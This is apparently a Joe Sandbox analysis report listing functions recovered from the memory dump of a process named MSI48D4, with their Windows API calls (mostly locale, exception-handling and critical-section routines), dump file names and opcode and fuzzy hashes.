Function 00C1D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C1C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,0EAD22C0,?,00C53D30,000000FF), ref: 00C1C657
Part of subcall function 00C1C630: GetLastError.KERNEL32(?,00000000,00000000,0EAD22C0,?,00C53D30,000000FF), ref: 00C1C661

IsDebuggerPresent.KERNEL32(?,?,00C68AF0), ref: 00C1D0D8
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00C68AF0), ref: 00C1D0E7

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C1D0E2

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 201987a951803249c7c40414179d433abf4375e12f028e461db68799f2dba644
Instruction ID: a57c9a277ad35ad12dc1d3a40746623c663a297817c602d2d6c1a8c57c90c10b
Opcode Fuzzy Hash: 201987a951803249c7c40414179d433abf4375e12f028e461db68799f2dba644
Instruction Fuzzy Hash: 60E09BB41047518FD3309F28E90478A7BE4AF16341F00895DF85AD3640D7F4D5CD9B62

Function 00C4E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C4E28B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C4E2D5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C4E39B

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: bc91317c8e8c770b8d6d86ac48a0c88bc9fbc46323ee019c7e2ec078342b97dc
Instruction ID: 39970c1d31fd9d48b7700a32220d3fffaeef9112761d46998863b0edbc3774df
Opcode Fuzzy Hash: bc91317c8e8c770b8d6d86ac48a0c88bc9fbc46323ee019c7e2ec078342b97dc
Instruction Fuzzy Hash: 01619F719102079FEB299F29CC82BBE77A8FF04310F114179E925C7195E778DA85DB50

Function 00C36E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C36F13
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C36F1D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C36F2A

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c3ff8d39a397d6a151457c3b91f2230a8d2711a8750bec80748d58cfb8105e15
Instruction ID: 72060d209278e8986ce0d6f1de68d2f6ecb2d544adbbdcbdd7762bd98b013d8f
Opcode Fuzzy Hash: c3ff8d39a397d6a151457c3b91f2230a8d2711a8750bec80748d58cfb8105e15
Instruction Fuzzy Hash: A831C274911328ABCB21DF64D98978DBBB8BF08310F5042EAE51CA7250EB709B858F44

Function 00C145B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,0EAD22C0,00000001,00000000,?,00000000,00C54460,000000FF,?,00C1474D,00C13778,?,00000000,00000000,?), ref: 00C145DB
LockResource.KERNEL32(00000000,?,00000000,00C54460,000000FF,?,00C1474D,00C13778,?,00000000,00000000,?,?,?,?,00C13778), ref: 00C145E6
SizeofResource.KERNEL32(00000000,00000000,?,00000000,00C54460,000000FF,?,00C1474D,00C13778,?,00000000,00000000,?,?,?), ref: 00C145F4

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 237a8c0d7350cc637ae3f42be1dcd6bf78b8abe307b2c330bafc1af3eb6be7d4
Instruction ID: c5be6322d344ceca205b69f6b1208a5f2ac30046efaacd82451e07f5906ff9a8
Opcode Fuzzy Hash: 237a8c0d7350cc637ae3f42be1dcd6bf78b8abe307b2c330bafc1af3eb6be7d4
Instruction Fuzzy Hash: 2811CA32A046549BC7398F59EC44BBAB7FCE786719F00462AFC29D3280E7359D848690

Function 00C3E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction ID: ba7791703d8d031adc19cd84af92fff96c2b7d2d4ec00ba4ff04265c6d478893
Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction Fuzzy Hash: 63F13F71E102199FDF14CFA9C9806ADF7B1FF98324F158269E825A7391D730AE45CB90

Function 00C47B1F Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00C47F64,00000000,00000000,00000000), ref: 00C47E23

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 31b8803052f82eb6104c81b0242c24e02823025c766d0ae8dcf6ac8836e8203c
Instruction ID: 0774baef979572dc25174afe9e7c789ec4eb2d8aa7142858c5837b0eb203246c
Opcode Fuzzy Hash: 31b8803052f82eb6104c81b0242c24e02823025c766d0ae8dcf6ac8836e8203c
Instruction Fuzzy Hash: 0BD13372E04215ABDB24ABA4DD42BBEBBB8FF04750F104256F911EB291EB709F41D790

Function 00C484BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C484B8,?,?,00000008,?,?,00C514E4,00000000), ref: 00C486EA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b369278c0e78b6a263e66f063435e119503f2dccc630e7b20d801290612a089d
Instruction ID: 5244d19104941037739b3dca049fb9ad02a7c7f0df9b0fc1185da608e309e922
Opcode Fuzzy Hash: b369278c0e78b6a263e66f063435e119503f2dccc630e7b20d801290612a089d
Instruction Fuzzy Hash: 49B15F31610604CFD715CF28C496BA97BE0FF45364F258658F9AACF2A1CB35EA95CB40

Function 00C335A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C335BF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: a96b4be30694ef67453ee3e4fdb5c96a9bcffb09c0d7f0533a7780fade8d60ea
Instruction ID: e6b6ff823b8edf5a6c343aef684b9ac57dba8249ccff9de6469712b9d69f3288
Opcode Fuzzy Hash: a96b4be30694ef67453ee3e4fdb5c96a9bcffb09c0d7f0533a7780fade8d60ea
Instruction Fuzzy Hash: 6C516AB1A24245DFEB25CF5AD8857AEBBF0FB44354F14852AD416EB350D3B49A40CF60

Function 00C3A587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00C3A715

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: bb7b2c4f8e71c1ac4f8ee10875be630c460eb742dce57545afd695766b5e61a1
Instruction ID: 949d04a6925da64b590460ec04734e8dc9214b6dcebe0225dee6a6383fce42e6
Opcode Fuzzy Hash: bb7b2c4f8e71c1ac4f8ee10875be630c460eb742dce57545afd695766b5e61a1
Instruction Fuzzy Hash: 9FC1D3709206468FCB28CF29C495ABEB7B1BF45310F28461DE4E697291C731EE66CB53

Function 00C4E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C4E4DE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4da0c4ccc0efdd61554f169a73e9585eff6da13c5e86ff235845c114d543e8a4
Instruction ID: 4f5303be1e47f7e9a0e9717d404b8400887aa569ca52a64e52c69940613484c7
Opcode Fuzzy Hash: 4da0c4ccc0efdd61554f169a73e9585eff6da13c5e86ff235845c114d543e8a4
Instruction Fuzzy Hash: C1218E72614206ABDB28AE29DC42BBA77A8FF04718F15407AF915D6141FB74EE40EB50

Function 00C4E111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

EnumSystemLocalesW.KERNEL32(00C4E237,00000001,00000000,?,-00000050,?,00C4E868,00000000,?,?,?,00000055,?), ref: 00C4E183

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5cdb1f1f7c50f114b4d34962d073c1d9d909ce735d21ccb193a2982ed93306c0
Instruction ID: b5a4f0786491b1fd29101a5d375e2e1bfe66011115583159ed49d908302d28dd
Opcode Fuzzy Hash: 5cdb1f1f7c50f114b4d34962d073c1d9d909ce735d21ccb193a2982ed93306c0
Instruction Fuzzy Hash: 7111E93B2007019FDB189F39C891ABEB7A1FF84759B16442DE95647A41D7717942CB40

Function 00C4E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C4E453,00000000,00000000,?), ref: 00C4E6E5

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 95a460434c6422411760ba7a46ab48fd4abe4b526938fd76a2048fc8d716bb18
Instruction ID: 2c00584ecd8453bba0a047364b2d907abef036b95832a4cccb7ed9e0a2f0f3a7
Opcode Fuzzy Hash: 95a460434c6422411760ba7a46ab48fd4abe4b526938fd76a2048fc8d716bb18
Instruction Fuzzy Hash: 68F0CD36600212BBDB285765CC05BBE7B68FB407B4F160464ED16A3180EE74FE41C690

Function 00C4E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

EnumSystemLocalesW.KERNEL32(00C4E48A,00000001,?,?,-00000050,?,00C4E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C4E1F6

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1a5409765d4c3c8b7b1f1445b52beef4cae85132b4cdadeaba77aa3606b80c38
Instruction ID: c7d2a856ce615f913ca3d7d8582ca83dfc9508736ac35574b22b68e9952e206c
Opcode Fuzzy Hash: 1a5409765d4c3c8b7b1f1445b52beef4cae85132b4cdadeaba77aa3606b80c38
Instruction Fuzzy Hash: F6F046362003045FCB245F389C85A7E7BA4FF80728F06442CFA058BA81C6B19D42DA50

Function 00C47132 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00C41C9A: EnterCriticalSection.KERNEL32(-00C6DE50,?,00C43576,?,00C6A078,0000000C,00C43841,?), ref: 00C41CA9

EnumSystemLocalesW.KERNEL32(Function_00037125,00000001,00C6A1D8,0000000C,00C47554,?), ref: 00C4716A

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: cc4be2456e5aede4f38e82d2b2c1e4e52b6f83595b87ddefc25b1fa4f9edd060
Instruction ID: af1f9f2ab39377dcf3ea479a4678cd928e8093759e7850dd286dbbed047f2634
Opcode Fuzzy Hash: cc4be2456e5aede4f38e82d2b2c1e4e52b6f83595b87ddefc25b1fa4f9edd060
Instruction Fuzzy Hash: B2F06D76A54300EFDB10EF98E946B9D77F0FB48721F00466AF816EB2A0EBB549409F40

Function 00C4E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

EnumSystemLocalesW.KERNEL32(00C4E01F,00000001,?,?,?,00C4E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C4E0FD

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bfbe5171fd6123152734685817dfa8769a1afdd927cb3234b89cb17229bbceb4
Instruction ID: c0489ae411e1163be69bdb27da16f4b44ee992333be3806c34551c0a886cf28d
Opcode Fuzzy Hash: bfbe5171fd6123152734685817dfa8769a1afdd927cb3234b89cb17229bbceb4
Instruction Fuzzy Hash: D6F02B3A30030597CB04AF35DC45B6EBF95FFC1760F074068EA2A8B651C6729982E790

Function 00C323F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00C300E2,00000000,00000000,00000004,00C2ED14,00000000,00000004,00C2F127,00000000,00000000), ref: 00C32410

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 51c59ba04d36cc493c4b8fc489278eaebe356939b15302a78201ddabe5b488c4
Instruction ID: 33e6adf433536850a4167a83dc434661158cd93804e29474b0ae3bd6f9e6ac71
Opcode Fuzzy Hash: 51c59ba04d36cc493c4b8fc489278eaebe356939b15302a78201ddabe5b488c4
Instruction Fuzzy Hash: 9FE0D832664204B6EF154BB8AE0FFBE7698E70070AF504551EA02E40D1DAA1CB50A161

Function 00C476AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C44E3F,?,20001004,00000000,00000002,?,?,00C44441), ref: 00C476E3

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a2eecfa5bdebffb97280b95ac2542c13d32c32e4f5fbde527fca4a0c0a728a3f
Instruction ID: 5c760c0aa7a056cc2519c12d9bfbdfbec2b4cef418620213e7bfa9c7dae07ac3
Opcode Fuzzy Hash: a2eecfa5bdebffb97280b95ac2542c13d32c32e4f5fbde527fca4a0c0a728a3f
Instruction Fuzzy Hash: 23E04F3650861DBBCF122F61EC09BAE3E26FF44751F014210FC0575160CB718960AAD5

Function 00C3353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00C33077), ref: 00C33544

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c9060ed325ea0363bf656fb9e59043f7669843a93633e0851876f688ffa9a742
Instruction ID: cf1337d382cc79d6db6748ce07d441c4f4afa2e6219d5783b0e156c097b28dcd
Opcode Fuzzy Hash: c9060ed325ea0363bf656fb9e59043f7669843a93633e0851876f688ffa9a742
Instruction Fuzzy Hash:

Function 00C12310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C32C98: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CA3
Part of subcall function 00C32C98: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CE0

GetProcessHeap.KERNEL32 ref: 00C12365

Part of subcall function 00C32C4E: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C58
Part of subcall function 00C32C4E: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C8B
Part of subcall function 00C32C4E: RtlWakeAllConditionVariable.NTDLL ref: 00C32D02

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID:
API String ID: 325507722-0
Opcode ID: 53e05f414cc74655882d4496c4c92d941c4792410ee7affce5d995012a60c529
Instruction ID: 68e7b62e749436628af96f593f20a417a2002234a8fef20ba5d309b558767a07
Opcode Fuzzy Hash: 53e05f414cc74655882d4496c4c92d941c4792410ee7affce5d995012a60c529
Instruction Fuzzy Hash: 79219AB8911248DBEB30CF5AEC8678D77B0E725320F00422AF5269B3E0D3F599449F52

Function 00C40A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

